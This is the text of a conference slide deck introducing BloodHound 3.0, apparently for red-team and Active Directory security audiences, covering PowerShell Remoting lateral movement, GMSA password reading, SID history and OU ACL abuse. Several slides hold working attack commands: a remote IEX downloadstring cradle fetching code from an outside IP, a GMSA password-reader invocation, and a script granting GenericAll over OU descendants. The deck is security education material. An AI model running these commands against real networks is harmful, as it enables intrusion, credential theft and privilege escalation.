BLOODHOUND 3.0

HELLO!

We are:

Andy Robbins (@_wald0)

Rohan Vazarkar (@CptJesus)

2

Agenda

• Prior Work
• Acknowledgements
• New Attack Primitives
• Quality of Life Improvements
• Performance Improvements
• Q&A

3

Prior Work

• Heat-ray by John Dunagan, Alice Zheng, and Daniel R. Simon (2009)
• Active Directory Control Paths by Emmanuel Gras and Lucas Bouillot (2014)
• PowerView by Will Schroeder
• Everything on ADSecurity.org by Sean Metcalf
• DSInternals by Michael Grafnetter

4

Acknowledgements

• Tim McGuffin (@NotMedic)
• Michael Grafnetter (@MGrafnetter)
• Will Schroeder (@harmj0y)
• Lee Christensen (@tifkin_)
• Sean Metcalf (@PyroTek3)
• Dirk-jan Mollema (@_dirkjan)
• Mark Gamache (@markgamacheNerd)

5

New Attack Primitives

6

PowerShell Remoting

Use (yet another) legitimate Windows protocol for lateral movement

7

PowerShell Remoting

• Based on membership in the “Remote Management Users” local group
• The remote system must also have port 5985/5986 open and accessible
• PowerShell remoting enables remote code execution…
• … but does not guarantee privileged code execution

8

$session = New-PSSession -ComputerName win-2016-001

​

Invoke-Command -Session $session -ScriptBlock {IEX ((new-object net.webclient).downloadstring('http://192.168.231.99:80/a'))}

​

Disconnect-PSSession -Session $session��Remove-PSSession -Session $session

9

$session = New-PSSession -ComputerName win-2016-001; Invoke-Command -Session $session -ScriptBlock {IEX ((new-object net.webclient).downloadstring('http://192.168.231.99:80/a'))}; Disconnect-PSSession -Session $session; Remove-PSSession -Session $session

10

11

DEMO

12

GMSA Control

Read plaintext passwords of special service accounts in Active Directory

13

GMSA Control

• Group Managed Service Account
• Special type of AD service account
• Introduced in Windows Server 2012
• Password managed by domain controllers
• Password automatically changes every 30 days
• Plain-text password remotely retrievable by authorized principals

14

15

16

GMSA: Best Practice vs Reality

Best Practice:

​

• Only the machine can read the GMSA password
• GMSA runs applications, but isn’t a local admin
• GMSA has no special privileges in AD

Reality:

​

• Very liberal inbound permissions on GMSA
• Very commonly made local admin
• GMSA can be added to AD groups...

17

GMSA: Reality

18

Attack Plan

We’ll read and use the plain text password of the GMSA account

​

We will need:

• The name of the GMSA

19

20

GMSAPasswordReader.exe --AccountName SQL01

21

Source: GMSAPasswordReader by Rohan Vazarkar

22

DEMO

23

24

25

GMSA Control Resources

• GMSA Password Reader�
• DSInternals�
• PSgMSAPwd�
• ADSecurity

26

SID History

The other “MemberOf” edge

27

SID History

• Most commonly associated with Golden Tickets�
• Golden Tickets abuse legitimate functionality in Active Directory�
• That legitimate functionality is actually used… legitimately!

28

29

30

31

FABRIKAM.LOCAL

32

FABRIKAM.LOCAL

CONTOSO.LOCAL

33

FABRIKAM.LOCAL

CONTOSO.LOCAL

34

FABRIKAM.LOCAL

CONTOSO.LOCAL

OU�Control

Push evil ACEs to descendent objects

35

OU Control

• Objects are organized into Organizational Units�
• ACEs set on OUs may inherit down to child objects�
• Control the OU, control its descendents

36

37

Attack Plan (easy mode)

We’ll grant ourselves full control of all descendent objects

​

We will need:

• The name of the principal we want to grant control to
• The GUID of the OU we control

38

39

40

$Guids = Get-DomainGUIDMap

$AllObjectsPropertyGuid = `

$Guids.GetEnumerator() | `

Where-Object {$_.value -eq 'All'} | `

Select -ExpandProperty name

41

Source: New-ADObjectAccessControlEntry by Lee Christensen

$ACE = New-ADObjectAccessControlEntry`� -Verbose `� -PrincipalIdentity JBUI `� -Right GenericAll `� -AccessControlType Allow `� -InheritanceType All `� -InheritedObjectType $AllObjectPropertyGuid

42

Source: New-ADObjectAccessControlEntry by Lee Christensen

$OU = Get-DomainOU -Raw `� ‘d7d498c0-231a-4e0d-9ceb-1c5d1ea23807’

$DsEntry = $OU.GetDirectoryEntry()

$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'

$dsEntry.PsBase.ObjectSecurity.AddAccessRule(`� $ACE)

$dsEntry.PsBase.CommitChanges()

43

Source: New-ADObjectAccessControlEntry by Lee Christensen

$Guids = Get-DomainGUIDMap; $AllObjectsPropertyGuid = $Guids.GetEnumerator() | Where-Object {$_.value -eq 'All'} | Select -ExpandProperty name; $ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity JBUI -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectPropertyGuid; $OU = Get-DomainOU -Raw ‘d7d498c0-231a-4e0d-9ceb-1c5d1ea23807’; $DsEntry = $OU.GetDirectoryEntry(); $dsEntry.PsBase.Options.SecurityMasks = 'Dacl'; $dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE); $dsEntry.PsBase.CommitChanges()

44

Source: New-ADObjectAccessControlEntry by Lee Christensen

45

46

Quality of Life Improvements

47

Quality of Life Improvements

• Less stress on Neo4j by avoiding expensive queries
• Improved node data displays with collapsing
• Warnings on large graph rendering
• Improved dark mode support

48

Performance Improvements

49

Performance Improvements

• Faster LDAP collect (~25-30% faster)
• Better caching support to speed up resolution
• Slower, but significantly more accurate computer data collection

50

THANKS!

You can find us at:

• @_wald0
• @CptJesus
• @SpecterOps

�Join the BloodHound Slack:

• https://bloodhoundgang.herokuapp.com

�Link to this deck:� https://bit.ly/3837gTx

​

​

Companion blog post:

• https://bit.ly/3bu3chl

Get BloodHound 3.0:

• https://bit.ly/GetBloodHound

51

Credits

Special thanks to all the people who made and released these awesome resources for free:

• Presentation template by SlidesCarnival
• Photographs by Startupstockphotos

52